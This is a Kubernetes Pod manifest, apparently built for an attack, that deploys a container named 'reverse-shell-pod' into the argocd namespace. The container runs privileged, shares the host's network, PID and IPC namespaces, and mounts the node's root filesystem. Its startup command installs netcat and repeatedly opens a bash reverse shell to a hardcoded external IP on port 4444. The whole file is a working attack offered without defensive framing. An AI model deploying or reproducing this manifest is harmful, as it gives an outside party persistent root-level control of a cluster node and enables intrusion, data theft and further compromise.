apiVersion: v1
kind: Pod
metadata:
  name: reverse-shell-pod
  namespace: argocd
  labels:
    app: reverse-shell
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  restartPolicy: Never
  containers:
    - name: reverse-shell
      image: ubuntu:latest
      command: ["/bin/bash", "-c", "--"]
      args:
        - |
          # Install netcat
          apt-get update && apt-get install -y netcat && \
          # Create and execute the reverse shell
          while true; do \
            /bin/bash -i >& /dev/tcp/23.27.169.114/4444 0>&1; \
            sleep 10; \
          done
      securityContext:
        privileged: true  # Set to false unless needed
      tty: true
      stdin: true
      volumeMounts:
        - mountPath: /host
          name: noderoot
  volumes:
    - name: noderoot
      hostPath:
        path: /        
